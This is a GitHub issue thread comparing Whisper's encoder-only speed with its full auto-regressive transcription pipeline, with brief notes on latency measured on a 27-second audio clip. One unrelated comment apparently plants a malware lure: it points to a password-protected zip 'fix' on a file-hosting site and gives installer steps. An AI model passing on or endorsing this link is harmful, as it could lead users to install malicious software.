### ISSUE TITLE
Benchmark: Rough benchmark to compare encoder only vs transcription pipeline of whisper

### ISSUE THREAD

**Issue by tikikun** [homebrewltd/llama3-s#40]

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tikikun** [comment]
![image](https://github.com/user-attachments/assets/90742c92-7f51-4a2e-bd89-3d34cda6269e)

**Comment by tikikun** [comment]
@0xSage

**Comment by tikikun** [comment]
Note:
- The speed of the encoder, vs the whisper both can be improved
- We test on an audio file of 27s len to demonstrate why whisper auto-regressive nature can yield latency
- The encoder result will not be changed regardless of 1->30s audio
